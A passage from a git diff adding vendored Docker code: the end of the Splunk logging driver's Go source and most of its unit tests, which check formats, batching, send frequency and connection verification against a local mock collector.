error { + for key := range cfg { + switch key { + case splunkURLKey: + case splunkTokenKey: + case splunkSourceKey: + case splunkSourceTypeKey: + case splunkIndexKey: + case splunkCAPathKey: + case splunkCANameKey: + case splunkInsecureSkipVerifyKey: + case splunkFormatKey: + case splunkVerifyConnectionKey: + case splunkGzipCompressionKey: + case splunkGzipCompressionLevelKey: + case envKey: + case labelsKey: + case tagKey: + default: + return fmt.Errorf("unknown log opt '%s' for %s log driver", key, driverName) + } + } + return nil +} + +func parseURL(ctx logger.Context) (*url.URL, error) { + splunkURLStr, ok := ctx.Config[splunkURLKey] + if !ok { + return nil, fmt.Errorf("%s: %s is expected", driverName, splunkURLKey) + } + + splunkURL, err := url.Parse(splunkURLStr) + if err != nil { + return nil, fmt.Errorf("%s: failed to parse %s as url value in %s", driverName, splunkURLStr, splunkURLKey) + } + + if !urlutil.IsURL(splunkURLStr) || + !splunkURL.IsAbs() || + (splunkURL.Path != "" && splunkURL.Path != "/") || + splunkURL.RawQuery != "" || + splunkURL.Fragment != "" { + return nil, fmt.Errorf("%s: expected format scheme://dns_name_or_ip:port for %s", driverName, splunkURLKey) + } + + splunkURL.Path = "/services/collector/event/1.0" + + return splunkURL, nil +} + +func verifySplunkConnection(l *splunkLogger) error { + req, err := http.NewRequest(http.MethodOptions, l.url, nil) + if err != nil { + return err + } + res, err := l.client.Do(req) + if err != nil { + return err + } + if res.Body != nil { + defer res.Body.Close() + } + if res.StatusCode != http.StatusOK { + var body []byte + body, err = ioutil.ReadAll(res.Body) + if err != nil { + return err + } + return fmt.Errorf("%s: failed to verify connection - %s - %s", driverName, res.Status, body) + } + return nil +} + +func getAdvancedOptionDuration(envName string, defaultValue time.Duration) time.Duration { + valueStr := os.Getenv(envName) + if valueStr == "" { + return defaultValue + } + parsedValue, err := 
time.ParseDuration(valueStr) + if err != nil { + logrus.Error(fmt.Sprintf("Failed to parse value of %s as duration. Using default %v. %v", envName, defaultValue, err)) + return defaultValue + } + return parsedValue +} + +func getAdvancedOptionInt(envName string, defaultValue int) int { + valueStr := os.Getenv(envName) + if valueStr == "" { + return defaultValue + } + parsedValue, err := strconv.ParseInt(valueStr, 10, 32) + if err != nil { + logrus.Error(fmt.Sprintf("Failed to parse value of %s as integer. Using default %d. %v", envName, defaultValue, err)) + return defaultValue + } + return int(parsedValue) +} diff --git a/vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go new file mode 100644 index 0000000000..df74cbad5f --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go @@ -0,0 +1,1302 @@ +package splunk + +import ( + "compress/gzip" + "fmt" + "os" + "testing" + "time" + + "github.com/docker/docker/daemon/logger" +) + +// Validate options +func TestValidateLogOpt(t *testing.T) { + err := ValidateLogOpt(map[string]string{ + splunkURLKey: "http://127.0.0.1", + splunkTokenKey: "2160C7EF-2CE9-4307-A180-F852B99CF417", + splunkSourceKey: "mysource", + splunkSourceTypeKey: "mysourcetype", + splunkIndexKey: "myindex", + splunkCAPathKey: "/usr/cert.pem", + splunkCANameKey: "ca_name", + splunkInsecureSkipVerifyKey: "true", + splunkFormatKey: "json", + splunkVerifyConnectionKey: "true", + splunkGzipCompressionKey: "true", + splunkGzipCompressionLevelKey: "1", + envKey: "a", + labelsKey: "b", + tagKey: "c", + }) + if err != nil { + t.Fatal(err) + } + + err = ValidateLogOpt(map[string]string{ + "not-supported-option": "a", + }) + if err == nil { + t.Fatal("Expecting error on unsupported options") + } +} + +// Driver require user to specify required options +func TestNewMissedConfig(t *testing.T) { + ctx := logger.Context{ + Config: map[string]string{}, + 
} + _, err := New(ctx) + if err == nil { + t.Fatal("Logger driver should fail when no required parameters specified") + } +} + +// Driver require user to specify splunk-url +func TestNewMissedUrl(t *testing.T) { + ctx := logger.Context{ + Config: map[string]string{ + splunkTokenKey: "4642492F-D8BD-47F1-A005-0C08AE4657DF", + }, + } + _, err := New(ctx) + if err.Error() != "splunk: splunk-url is expected" { + t.Fatal("Logger driver should fail when no required parameters specified") + } +} + +// Driver require user to specify splunk-token +func TestNewMissedToken(t *testing.T) { + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: "http://127.0.0.1:8088", + }, + } + _, err := New(ctx) + if err.Error() != "splunk: splunk-token is expected" { + t.Fatal("Logger driver should fail when no required parameters specified") + } +} + +// Test default settings +func TestDefault(t *testing.T) { + hec := NewHTTPEventCollectorMock(t) + + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + }, + ContainerID: "containeriid", + ContainerName: "container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + hostname, err := ctx.Hostname() + if err != nil { + t.Fatal(err) + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + if loggerDriver.Name() != driverName { + t.Fatal("Unexpected logger driver name") + } + + if !hec.connectionVerified { + t.Fatal("By default connection should be verified") + } + + splunkLoggerDriver, ok := loggerDriver.(*splunkLoggerInline) + if !ok { + t.Fatal("Unexpected Splunk Logging Driver type") + } + + if splunkLoggerDriver.url != hec.URL()+"/services/collector/event/1.0" || + splunkLoggerDriver.auth != "Splunk "+hec.token || + splunkLoggerDriver.nullMessage.Host != hostname || + splunkLoggerDriver.nullMessage.Source != "" || + splunkLoggerDriver.nullMessage.SourceType != "" || + 
splunkLoggerDriver.nullMessage.Index != "" || + splunkLoggerDriver.gzipCompression != false || + splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || + splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || + splunkLoggerDriver.bufferMaximum != defaultBufferMaximum || + cap(splunkLoggerDriver.stream) != defaultStreamChannelSize { + t.Fatal("Found not default values setup in Splunk Logging Driver.") + } + + message1Time := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil { + t.Fatal(err) + } + message2Time := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("notajson"), "stdout", message2Time, nil, false}); err != nil { + t.Fatal(err) + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != 2 { + t.Fatal("Expected two messages") + } + + if *hec.gzipEnabled { + t.Fatal("Gzip should not be used") + } + + message1 := hec.messages[0] + if message1.Time != fmt.Sprintf("%f", float64(message1Time.UnixNano())/float64(time.Second)) || + message1.Host != hostname || + message1.Source != "" || + message1.SourceType != "" || + message1.Index != "" { + t.Fatalf("Unexpected values of message 1 %v", message1) + } + + if event, err := message1.EventAsMap(); err != nil { + t.Fatal(err) + } else { + if event["line"] != "{\"a\":\"b\"}" || + event["source"] != "stdout" || + event["tag"] != "containeriid" || + len(event) != 3 { + t.Fatalf("Unexpected event in message %v", event) + } + } + + message2 := hec.messages[1] + if message2.Time != fmt.Sprintf("%f", float64(message2Time.UnixNano())/float64(time.Second)) || + message2.Host != hostname || + message2.Source != "" || + message2.SourceType != "" || + message2.Index != "" { + t.Fatalf("Unexpected values of message 1 %v", message2) + } + + if event, err := message2.EventAsMap(); err != nil { + t.Fatal(err) + } else { + if event["line"] != "notajson" || + 
event["source"] != "stdout" || + event["tag"] != "containeriid" || + len(event) != 3 { + t.Fatalf("Unexpected event in message %v", event) + } + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } +} + +// Verify inline format with a not default settings for most of options +func TestInlineFormatWithNonDefaultOptions(t *testing.T) { + hec := NewHTTPEventCollectorMock(t) + + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + splunkSourceKey: "mysource", + splunkSourceTypeKey: "mysourcetype", + splunkIndexKey: "myindex", + splunkFormatKey: splunkFormatInline, + splunkGzipCompressionKey: "true", + tagKey: "{{.ImageName}}/{{.Name}}", + labelsKey: "a", + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + ContainerLabels: map[string]string{ + "a": "b", + }, + } + + hostname, err := ctx.Hostname() + if err != nil { + t.Fatal(err) + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + if !hec.connectionVerified { + t.Fatal("By default connection should be verified") + } + + splunkLoggerDriver, ok := loggerDriver.(*splunkLoggerInline) + if !ok { + t.Fatal("Unexpected Splunk Logging Driver type") + } + + if splunkLoggerDriver.url != hec.URL()+"/services/collector/event/1.0" || + splunkLoggerDriver.auth != "Splunk "+hec.token || + splunkLoggerDriver.nullMessage.Host != hostname || + splunkLoggerDriver.nullMessage.Source != "mysource" || + splunkLoggerDriver.nullMessage.SourceType != "mysourcetype" || + splunkLoggerDriver.nullMessage.Index != "myindex" || + splunkLoggerDriver.gzipCompression != true || + splunkLoggerDriver.gzipCompressionLevel != gzip.DefaultCompression || + splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || + splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || + splunkLoggerDriver.bufferMaximum != 
defaultBufferMaximum || + cap(splunkLoggerDriver.stream) != defaultStreamChannelSize { + t.Fatal("Values do not match configuration.") + } + + messageTime := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("1"), "stdout", messageTime, nil, false}); err != nil { + t.Fatal(err) + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != 1 { + t.Fatal("Expected one message") + } + + if !*hec.gzipEnabled { + t.Fatal("Gzip should be used") + } + + message := hec.messages[0] + if message.Time != fmt.Sprintf("%f", float64(messageTime.UnixNano())/float64(time.Second)) || + message.Host != hostname || + message.Source != "mysource" || + message.SourceType != "mysourcetype" || + message.Index != "myindex" { + t.Fatalf("Unexpected values of message %v", message) + } + + if event, err := message.EventAsMap(); err != nil { + t.Fatal(err) + } else { + if event["line"] != "1" || + event["source"] != "stdout" || + event["tag"] != "container_image_name/container_name" || + event["attrs"].(map[string]interface{})["a"] != "b" || + len(event) != 4 { + t.Fatalf("Unexpected event in message %v", event) + } + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } +} + +// Verify JSON format +func TestJsonFormat(t *testing.T) { + hec := NewHTTPEventCollectorMock(t) + + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + splunkFormatKey: splunkFormatJSON, + splunkGzipCompressionKey: "true", + splunkGzipCompressionLevelKey: "1", + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + hostname, err := ctx.Hostname() + if err != nil { + t.Fatal(err) + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + if !hec.connectionVerified { + t.Fatal("By default connection should be verified") + } + + splunkLoggerDriver, ok := 
loggerDriver.(*splunkLoggerJSON) + if !ok { + t.Fatal("Unexpected Splunk Logging Driver type") + } + + if splunkLoggerDriver.url != hec.URL()+"/services/collector/event/1.0" || + splunkLoggerDriver.auth != "Splunk "+hec.token || + splunkLoggerDriver.nullMessage.Host != hostname || + splunkLoggerDriver.nullMessage.Source != "" || + splunkLoggerDriver.nullMessage.SourceType != "" || + splunkLoggerDriver.nullMessage.Index != "" || + splunkLoggerDriver.gzipCompression != true || + splunkLoggerDriver.gzipCompressionLevel != gzip.BestSpeed || + splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || + splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || + splunkLoggerDriver.bufferMaximum != defaultBufferMaximum || + cap(splunkLoggerDriver.stream) != defaultStreamChannelSize { + t.Fatal("Values do not match configuration.") + } + + message1Time := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil { + t.Fatal(err) + } + message2Time := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil { + t.Fatal(err) + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != 2 { + t.Fatal("Expected two messages") + } + + message1 := hec.messages[0] + if message1.Time != fmt.Sprintf("%f", float64(message1Time.UnixNano())/float64(time.Second)) || + message1.Host != hostname || + message1.Source != "" || + message1.SourceType != "" || + message1.Index != "" { + t.Fatalf("Unexpected values of message 1 %v", message1) + } + + if event, err := message1.EventAsMap(); err != nil { + t.Fatal(err) + } else { + if event["line"].(map[string]interface{})["a"] != "b" || + event["source"] != "stdout" || + event["tag"] != "containeriid" || + len(event) != 3 { + t.Fatalf("Unexpected event in message 1 %v", event) + } + } + + message2 := hec.messages[1] + if message2.Time 
!= fmt.Sprintf("%f", float64(message2Time.UnixNano())/float64(time.Second)) || + message2.Host != hostname || + message2.Source != "" || + message2.SourceType != "" || + message2.Index != "" { + t.Fatalf("Unexpected values of message 2 %v", message2) + } + + // If message cannot be parsed as JSON - it should be sent as a line + if event, err := message2.EventAsMap(); err != nil { + t.Fatal(err) + } else { + if event["line"] != "notjson" || + event["source"] != "stdout" || + event["tag"] != "containeriid" || + len(event) != 3 { + t.Fatalf("Unexpected event in message 2 %v", event) + } + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } +} + +// Verify raw format +func TestRawFormat(t *testing.T) { + hec := NewHTTPEventCollectorMock(t) + + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + splunkFormatKey: splunkFormatRaw, + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + hostname, err := ctx.Hostname() + if err != nil { + t.Fatal(err) + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + if !hec.connectionVerified { + t.Fatal("By default connection should be verified") + } + + splunkLoggerDriver, ok := loggerDriver.(*splunkLoggerRaw) + if !ok { + t.Fatal("Unexpected Splunk Logging Driver type") + } + + if splunkLoggerDriver.url != hec.URL()+"/services/collector/event/1.0" || + splunkLoggerDriver.auth != "Splunk "+hec.token || + splunkLoggerDriver.nullMessage.Host != hostname || + splunkLoggerDriver.nullMessage.Source != "" || + splunkLoggerDriver.nullMessage.SourceType != "" || + splunkLoggerDriver.nullMessage.Index != "" || + splunkLoggerDriver.gzipCompression != false || + splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || + splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || + 
splunkLoggerDriver.bufferMaximum != defaultBufferMaximum || + cap(splunkLoggerDriver.stream) != defaultStreamChannelSize || + string(splunkLoggerDriver.prefix) != "containeriid " { + t.Fatal("Values do not match configuration.") + } + + message1Time := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil { + t.Fatal(err) + } + message2Time := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil { + t.Fatal(err) + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != 2 { + t.Fatal("Expected two messages") + } + + message1 := hec.messages[0] + if message1.Time != fmt.Sprintf("%f", float64(message1Time.UnixNano())/float64(time.Second)) || + message1.Host != hostname || + message1.Source != "" || + message1.SourceType != "" || + message1.Index != "" { + t.Fatalf("Unexpected values of message 1 %v", message1) + } + + if event, err := message1.EventAsString(); err != nil { + t.Fatal(err) + } else { + if event != "containeriid {\"a\":\"b\"}" { + t.Fatalf("Unexpected event in message 1 %v", event) + } + } + + message2 := hec.messages[1] + if message2.Time != fmt.Sprintf("%f", float64(message2Time.UnixNano())/float64(time.Second)) || + message2.Host != hostname || + message2.Source != "" || + message2.SourceType != "" || + message2.Index != "" { + t.Fatalf("Unexpected values of message 2 %v", message2) + } + + if event, err := message2.EventAsString(); err != nil { + t.Fatal(err) + } else { + if event != "containeriid notjson" { + t.Fatalf("Unexpected event in message 1 %v", event) + } + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } +} + +// Verify raw format with labels +func TestRawFormatWithLabels(t *testing.T) { + hec := NewHTTPEventCollectorMock(t) + + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: 
hec.token, + splunkFormatKey: splunkFormatRaw, + labelsKey: "a", + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + ContainerLabels: map[string]string{ + "a": "b", + }, + } + + hostname, err := ctx.Hostname() + if err != nil { + t.Fatal(err) + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + if !hec.connectionVerified { + t.Fatal("By default connection should be verified") + } + + splunkLoggerDriver, ok := loggerDriver.(*splunkLoggerRaw) + if !ok { + t.Fatal("Unexpected Splunk Logging Driver type") + } + + if splunkLoggerDriver.url != hec.URL()+"/services/collector/event/1.0" || + splunkLoggerDriver.auth != "Splunk "+hec.token || + splunkLoggerDriver.nullMessage.Host != hostname || + splunkLoggerDriver.nullMessage.Source != "" || + splunkLoggerDriver.nullMessage.SourceType != "" || + splunkLoggerDriver.nullMessage.Index != "" || + splunkLoggerDriver.gzipCompression != false || + splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || + splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || + splunkLoggerDriver.bufferMaximum != defaultBufferMaximum || + cap(splunkLoggerDriver.stream) != defaultStreamChannelSize || + string(splunkLoggerDriver.prefix) != "containeriid a=b " { + t.Fatal("Values do not match configuration.") + } + + message1Time := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil { + t.Fatal(err) + } + message2Time := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil { + t.Fatal(err) + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != 2 { + t.Fatal("Expected two messages") + } + + message1 := hec.messages[0] + if message1.Time != fmt.Sprintf("%f", 
float64(message1Time.UnixNano())/float64(time.Second)) || + message1.Host != hostname || + message1.Source != "" || + message1.SourceType != "" || + message1.Index != "" { + t.Fatalf("Unexpected values of message 1 %v", message1) + } + + if event, err := message1.EventAsString(); err != nil { + t.Fatal(err) + } else { + if event != "containeriid a=b {\"a\":\"b\"}" { + t.Fatalf("Unexpected event in message 1 %v", event) + } + } + + message2 := hec.messages[1] + if message2.Time != fmt.Sprintf("%f", float64(message2Time.UnixNano())/float64(time.Second)) || + message2.Host != hostname || + message2.Source != "" || + message2.SourceType != "" || + message2.Index != "" { + t.Fatalf("Unexpected values of message 2 %v", message2) + } + + if event, err := message2.EventAsString(); err != nil { + t.Fatal(err) + } else { + if event != "containeriid a=b notjson" { + t.Fatalf("Unexpected event in message 1 %v", event) + } + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } +} + +// Verify that Splunk Logging Driver can accept tag="" which will allow to send raw messages +// in the same way we get them in stdout/stderr +func TestRawFormatWithoutTag(t *testing.T) { + hec := NewHTTPEventCollectorMock(t) + + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + splunkFormatKey: splunkFormatRaw, + tagKey: "", + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + hostname, err := ctx.Hostname() + if err != nil { + t.Fatal(err) + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + if !hec.connectionVerified { + t.Fatal("By default connection should be verified") + } + + splunkLoggerDriver, ok := loggerDriver.(*splunkLoggerRaw) + if !ok { + t.Fatal("Unexpected Splunk Logging Driver type") + } + + if splunkLoggerDriver.url != hec.URL()+"/services/collector/event/1.0" || 
+ splunkLoggerDriver.auth != "Splunk "+hec.token || + splunkLoggerDriver.nullMessage.Host != hostname || + splunkLoggerDriver.nullMessage.Source != "" || + splunkLoggerDriver.nullMessage.SourceType != "" || + splunkLoggerDriver.nullMessage.Index != "" || + splunkLoggerDriver.gzipCompression != false || + splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || + splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || + splunkLoggerDriver.bufferMaximum != defaultBufferMaximum || + cap(splunkLoggerDriver.stream) != defaultStreamChannelSize || + string(splunkLoggerDriver.prefix) != "" { + t.Log(string(splunkLoggerDriver.prefix) + "a") + t.Fatal("Values do not match configuration.") + } + + message1Time := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil { + t.Fatal(err) + } + message2Time := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil { + t.Fatal(err) + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != 2 { + t.Fatal("Expected two messages") + } + + message1 := hec.messages[0] + if message1.Time != fmt.Sprintf("%f", float64(message1Time.UnixNano())/float64(time.Second)) || + message1.Host != hostname || + message1.Source != "" || + message1.SourceType != "" || + message1.Index != "" { + t.Fatalf("Unexpected values of message 1 %v", message1) + } + + if event, err := message1.EventAsString(); err != nil { + t.Fatal(err) + } else { + if event != "{\"a\":\"b\"}" { + t.Fatalf("Unexpected event in message 1 %v", event) + } + } + + message2 := hec.messages[1] + if message2.Time != fmt.Sprintf("%f", float64(message2Time.UnixNano())/float64(time.Second)) || + message2.Host != hostname || + message2.Source != "" || + message2.SourceType != "" || + message2.Index != "" { + t.Fatalf("Unexpected values of message 2 %v", message2) + } + + 
if event, err := message2.EventAsString(); err != nil {
		t.Fatal(err)
	} else {
		if event != "notjson" {
			// Fixed copy-paste error: this branch checks message 2, not message 1.
			t.Fatalf("Unexpected event in message 2 %v", event)
		}
	}

	err = hec.Close()
	if err != nil {
		t.Fatal(err)
	}
}

// Verify that we will send messages in batches with default batching parameters,
// but change frequency to be sure that numOfRequests will match expected 17 requests
func TestBatching(t *testing.T) {
	// Make the flush timer effectively never fire so that only the batch-size
	// threshold drives posting; this keeps the request count deterministic.
	if err := os.Setenv(envVarPostMessagesFrequency, "10h"); err != nil {
		t.Fatal(err)
	}

	hec := NewHTTPEventCollectorMock(t)

	go hec.Serve()

	ctx := logger.Context{
		Config: map[string]string{
			splunkURLKey:   hec.URL(),
			splunkTokenKey: hec.token,
		},
		ContainerID:        "containeriid",
		ContainerName:      "/container_name",
		ContainerImageID:   "contaimageid",
		ContainerImageName: "container_image_name",
	}

	loggerDriver, err := New(ctx)
	if err != nil {
		t.Fatal(err)
	}

	for i := 0; i < defaultStreamChannelSize*4; i++ {
		if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil {
			t.Fatal(err)
		}
	}

	err = loggerDriver.Close()
	if err != nil {
		t.Fatal(err)
	}

	if len(hec.messages) != defaultStreamChannelSize*4 {
		t.Fatal("Not all messages delivered")
	}

	// Messages must arrive in order with their original payloads intact.
	for i, message := range hec.messages {
		if event, err := message.EventAsMap(); err != nil {
			t.Fatal(err)
		} else {
			if event["line"] != fmt.Sprintf("%d", i) {
				t.Fatalf("Unexpected event in message %v", event)
			}
		}
	}

	// 1 to verify connection and 16 batches
	if hec.numOfRequests != 17 {
		t.Fatalf("Unexpected number of requests %d", hec.numOfRequests)
	}

	err = hec.Close()
	if err != nil {
		t.Fatal(err)
	}

	if err := os.Setenv(envVarPostMessagesFrequency, ""); err != nil {
		t.Fatal(err)
	}
}

// Verify that test is using time to fire events not rare than specified frequency
func TestFrequency(t *testing.T) {
	if err := 
os.Setenv(envVarPostMessagesFrequency, "5ms"); err != nil { + t.Fatal(err) + } + + hec := NewHTTPEventCollectorMock(t) + + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + for i := 0; i < 10; i++ { + if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + t.Fatal(err) + } + time.Sleep(15 * time.Millisecond) + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != 10 { + t.Fatal("Not all messages delivered") + } + + for i, message := range hec.messages { + if event, err := message.EventAsMap(); err != nil { + t.Fatal(err) + } else { + if event["line"] != fmt.Sprintf("%d", i) { + t.Fatalf("Unexpected event in message %v", event) + } + } + } + + // 1 to verify connection and 10 to verify that we have sent messages with required frequency, + // but because frequency is too small (to keep test quick), instead of 11, use 9 if context switches will be slow + if hec.numOfRequests < 9 { + t.Fatalf("Unexpected number of requests %d", hec.numOfRequests) + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarPostMessagesFrequency, ""); err != nil { + t.Fatal(err) + } +} + +// Simulate behavior similar to first version of Splunk Logging Driver, when we were sending one message +// per request +func TestOneMessagePerRequest(t *testing.T) { + if err := os.Setenv(envVarPostMessagesFrequency, "10h"); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarPostMessagesBatchSize, "1"); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarBufferMaximum, "1"); err != nil { + t.Fatal(err) + } + + if err := 
os.Setenv(envVarStreamChannelSize, "0"); err != nil { + t.Fatal(err) + } + + hec := NewHTTPEventCollectorMock(t) + + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + for i := 0; i < 10; i++ { + if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + t.Fatal(err) + } + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != 10 { + t.Fatal("Not all messages delivered") + } + + for i, message := range hec.messages { + if event, err := message.EventAsMap(); err != nil { + t.Fatal(err) + } else { + if event["line"] != fmt.Sprintf("%d", i) { + t.Fatalf("Unexpected event in message %v", event) + } + } + } + + // 1 to verify connection and 10 messages + if hec.numOfRequests != 11 { + t.Fatalf("Unexpected number of requests %d", hec.numOfRequests) + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarPostMessagesFrequency, ""); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarPostMessagesBatchSize, ""); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarBufferMaximum, ""); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarStreamChannelSize, ""); err != nil { + t.Fatal(err) + } +} + +// Driver should not be created when HEC is unresponsive +func TestVerify(t *testing.T) { + hec := NewHTTPEventCollectorMock(t) + hec.simulateServerError = true + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + 
ContainerImageName: "container_image_name", + } + + _, err := New(ctx) + if err == nil { + t.Fatal("Expecting driver to fail, when server is unresponsive") + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } +} + +// Verify that user can specify to skip verification that Splunk HEC is working. +// Also in this test we verify retry logic. +func TestSkipVerify(t *testing.T) { + hec := NewHTTPEventCollectorMock(t) + hec.simulateServerError = true + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + splunkVerifyConnectionKey: "false", + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + if hec.connectionVerified { + t.Fatal("Connection should not be verified") + } + + for i := 0; i < defaultStreamChannelSize*2; i++ { + if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + t.Fatal(err) + } + } + + if len(hec.messages) != 0 { + t.Fatal("No messages should be accepted at this point") + } + + hec.simulateServerError = false + + for i := defaultStreamChannelSize * 2; i < defaultStreamChannelSize*4; i++ { + if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + t.Fatal(err) + } + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != defaultStreamChannelSize*4 { + t.Fatal("Not all messages delivered") + } + + for i, message := range hec.messages { + if event, err := message.EventAsMap(); err != nil { + t.Fatal(err) + } else { + if event["line"] != fmt.Sprintf("%d", i) { + t.Fatalf("Unexpected event in message %v", event) + } + } + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } +} + +// Verify logic for when we filled 
whole buffer
func TestBufferMaximum(t *testing.T) {
	if err := os.Setenv(envVarPostMessagesBatchSize, "2"); err != nil {
		t.Fatal(err)
	}

	if err := os.Setenv(envVarBufferMaximum, "10"); err != nil {
		t.Fatal(err)
	}

	if err := os.Setenv(envVarStreamChannelSize, "0"); err != nil {
		t.Fatal(err)
	}

	hec := NewHTTPEventCollectorMock(t)
